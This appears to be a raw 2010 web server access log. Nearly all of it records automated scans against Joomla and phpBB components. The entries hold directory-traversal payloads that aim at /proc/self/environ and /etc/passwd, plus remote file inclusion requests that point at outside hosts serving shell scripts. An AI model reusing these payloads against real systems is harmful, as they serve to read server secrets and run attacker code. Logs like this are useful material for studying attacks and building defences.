109.123.73.50 - - [07/Jun/2010:04:21:06 -0500] "GET //index2.php?option=com_myblog&Itemid=28&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:21:06 -0500] "GET /logs//index2.php?option=com_myblog&Itemid=28&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
67.195.112.180 - - [07/Jun/2010:04:23:16 -0500] "GET /logs/access_log.1241740800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.138.176 - - [07/Jun/2010:04:23:28 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.121.138.176 - - [07/Jun/2010:04:23:29 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.121.138.176 - - [07/Jun/2010:04:24:08 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
67.227.143.132 - - [07/Jun/2010:04:24:15 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
109.71.41.45 - - [07/Jun/2010:04:24:32 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
109.71.41.45 - - [07/Jun/2010:04:24:59 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
109.71.41.45 - - [07/Jun/2010:04:24:59 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
91.121.138.176 - - [07/Jun/2010:04:25:40 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
67.227.143.132 - - [07/Jun/2010:04:25:45 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
109.71.41.45 - - [07/Jun/2010:04:25:55 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
72.55.146.200 - - [07/Jun/2010:04:26:55 -0500] "GET /logs/access_log.1212451200/templates/errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt?%0D?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
72.55.146.200 - - [07/Jun/2010:04:26:55 -0500] "GET /templates/errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt?%0D?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
72.55.146.200 - - [07/Jun/2010:04:26:55 -0500] "GET /logs/templates/errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt?%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
109.123.73.50 - - [07/Jun/2010:04:27:35 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:28:08 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
67.227.143.132 - - [07/Jun/2010:04:28:16 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [07/Jun/2010:04:28:17 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
109.123.73.50 - - [07/Jun/2010:04:29:11 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:29:11 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:29:11 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
207.7.108.203 - - [07/Jun/2010:04:29:34 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.161.129 - - [07/Jun/2010:04:29:48 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.808"
109.123.73.50 - - [07/Jun/2010:04:31:03 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_myblog&Itemid=28&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
212.69.208.145 - - [07/Jun/2010:04:31:30 -0500] "GET /logs/access_log.1274227200///index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.73"
212.69.208.145 - - [07/Jun/2010:04:31:30 -0500] "GET ///index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.73"
212.69.208.145 - - [07/Jun/2010:04:31:30 -0500] "GET /logs///index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.73"
67.227.143.132 - - [07/Jun/2010:04:31:31 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.227.143.132 - - [07/Jun/2010:04:31:31 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [07/Jun/2010:04:31:31 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
91.121.138.176 - - [07/Jun/2010:04:32:01 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
91.121.138.176 - - [07/Jun/2010:04:32:01 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.121.138.176 - - [07/Jun/2010:04:32:01 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
109.123.73.50 - - [07/Jun/2010:04:32:56 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:32:56 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:32:57 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
207.58.188.125 - - [07/Jun/2010:04:33:09 -0500] "GET /logs/access_log.1205107200/admin/admin_cms_config.php?phpbb_root_path=http://www.cts.ac.th/remote.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
207.58.188.125 - - [07/Jun/2010:04:33:09 -0500] "GET /admin/admin_cms_config.php?phpbb_root_path=http://www.cts.ac.th/remote.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
207.58.188.125 - - [07/Jun/2010:04:33:09 -0500] "GET /logs/admin/admin_cms_config.php?phpbb_root_path=http://www.cts.ac.th/remote.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
109.71.41.45 - - [07/Jun/2010:04:33:39 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
109.71.41.45 - - [07/Jun/2010:04:33:39 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
109.71.41.45 - - [07/Jun/2010:04:33:39 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
109.123.73.50 - - [07/Jun/2010:04:34:15 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:34:16 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:34:16 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
207.58.145.214 - - [07/Jun/2010:04:34:53 -0500] "GET /logs/http://marketlink.uk.net/img/.log/r57? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
207.58.145.214 - - [07/Jun/2010:04:34:53 -0500] "GET /http://marketlink.uk.net/img/.log/r57? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
80.246.53.17 - - [07/Jun/2010:04:35:25 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.246.53.17 - - [07/Jun/2010:04:35:25 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.246.53.17 - - [07/Jun/2010:04:35:29 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.246.53.17 - - [07/Jun/2010:04:35:29 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:04:35:47 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:04:35:53 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.161.129 - - [07/Jun/2010:04:36:10 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
80.246.53.17 - - [07/Jun/2010:04:36:56 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.246.53.17 - - [07/Jun/2010:04:36:56 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.198.171.53 - - [07/Jun/2010:04:36:57 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.198.171.53 - - [07/Jun/2010:04:36:57 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
109.123.73.50 - - [07/Jun/2010:04:36:57 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
87.198.171.53 - - [07/Jun/2010:04:37:05 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.198.171.53 - - [07/Jun/2010:04:37:05 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.198.171.53 - - [07/Jun/2010:04:37:47 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.198.171.53 - - [07/Jun/2010:04:37:48 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
80.246.53.17 - - [07/Jun/2010:04:38:20 -0500] "GET /logs//index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.246.53.17 - - [07/Jun/2010:04:38:21 -0500] "GET //index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.246.53.17 - - [07/Jun/2010:04:38:50 -0500] "GET /logs//index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.246.53.17 - - [07/Jun/2010:04:38:50 -0500] "GET //index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.246.53.17 - - [07/Jun/2010:04:40:06 -0500] "GET /logs//index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.246.53.17 - - [07/Jun/2010:04:40:06 -0500] "GET //index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
109.123.73.50 - - [07/Jun/2010:04:40:57 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:41:12 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_myblog&Itemid=28&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:41:12 -0500] "GET /index2.php?option=com_myblog&Itemid=28&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:41:13 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=28&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.121.161.129 - - [07/Jun/2010:04:41:45 -0500] "GET /logs/access_log.1274832000/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.808"
91.121.161.129 - - [07/Jun/2010:04:41:46 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.808"
91.121.161.129 - - [07/Jun/2010:04:41:46 -0500] "GET /logs/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.808"
91.121.161.129 - - [07/Jun/2010:04:42:13 -0500] "GET /logs/access_log.1274832000/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.808"
91.121.161.129 - - [07/Jun/2010:04:42:13 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.808"
91.121.161.129 - - [07/Jun/2010:04:42:14 -0500] "GET /logs/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.808"
109.123.73.50 - - [07/Jun/2010:04:43:05 -0500] "GET /logs/access_log.1274313600//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
207.46.199.178 - - [07/Jun/2010:04:44:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.161.129 - - [07/Jun/2010:04:45:01 -0500] "GET /logs/access_log.1273363200/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.808"
212.227.248.216 - - [07/Jun/2010:04:45:23 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:04:45:28 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:04:46:19 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:04:46:24 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:04:46:30 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.31.149.80 - - [07/Jun/2010:04:46:36 -0500] "GET /?option=com_fabrik&mosConfig.absolute.path=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
81.31.149.80 - - [07/Jun/2010:04:46:36 -0500] "GET /logs/?option=com_fabrik&mosConfig.absolute.path=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 200 8566 "-""Mozilla/5.0"
81.31.149.80 - - [07/Jun/2010:04:46:36 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&mosConfig.absolute.path=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.69.208.145 - - [07/Jun/2010:04:46:54 -0500] "GET /index2.php?option=com_fabrik&controller=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.69.208.145 - - [07/Jun/2010:04:46:54 -0500] "GET /logs/index2.php?option=com_fabrik&controller=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.69.208.145 - - [07/Jun/2010:04:46:55 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_fabrik&controller=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.69.208.145 - - [07/Jun/2010:04:46:56 -0500] "GET /index2.php?option=com_fabrik&controller=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.69.208.145 - - [07/Jun/2010:04:46:56 -0500] "GET /logs/index2.php?option=com_fabrik&controller=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.69.208.145 - - [07/Jun/2010:04:46:56 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_fabrik&controller=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.246.53.17 - - [07/Jun/2010:04:47:07 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.23.35.17 - - [07/Jun/2010:04:47:47 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
94.23.35.17 - - [07/Jun/2010:04:47:47 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
75.25.154.162 - - [07/Jun/2010:04:48:04 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:04:48:04 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.164.97 - - [07/Jun/2010:04:48:52 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:04:48:52 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.161.129 - - [07/Jun/2010:04:50:09 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
91.121.161.129 - - [07/Jun/2010:04:50:09 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.121.161.129 - - [07/Jun/2010:04:50:10 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
74.53.154.162 - - [07/Jun/2010:04:50:53 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:04:50:54 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
66.209.177.98 - - [07/Jun/2010:04:51:16 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:04:51:21 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
212.227.248.216 - - [07/Jun/2010:04:52:22 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:04:52:27 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.164.97 - - [07/Jun/2010:04:54:00 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:04:54:00 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.35.17 - - [07/Jun/2010:04:54:03 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
94.23.35.17 - - [07/Jun/2010:04:54:03 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.53.154.162 - - [07/Jun/2010:04:54:17 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
75.25.154.162 - - [07/Jun/2010:04:54:35 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:04:54:35 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.161.129 - - [07/Jun/2010:04:54:41 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
74.53.154.162 - - [07/Jun/2010:04:57:14 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
206.188.209.35 - - [07/Jun/2010:04:57:38 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
206.188.209.35 - - [07/Jun/2010:04:57:39 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
84.38.67.248 - - [07/Jun/2010:04:57:57 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 347 "-""libwww-perl/5.813"
84.38.67.248 - - [07/Jun/2010:04:57:57 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 342 "-""libwww-perl/5.813"
88.191.94.188 - - [07/Jun/2010:04:58:47 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:04:58:48 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.164.97 - - [07/Jun/2010:04:58:54 -0500] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:04:58:54 -0500] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.35.17 - - [07/Jun/2010:04:58:55 -0500] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
94.23.35.17 - - [07/Jun/2010:04:58:55 -0500] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
88.191.94.188 - - [07/Jun/2010:04:59:03 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:04:59:03 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.53.154.162 - - [07/Jun/2010:04:59:09 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:04:59:10 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
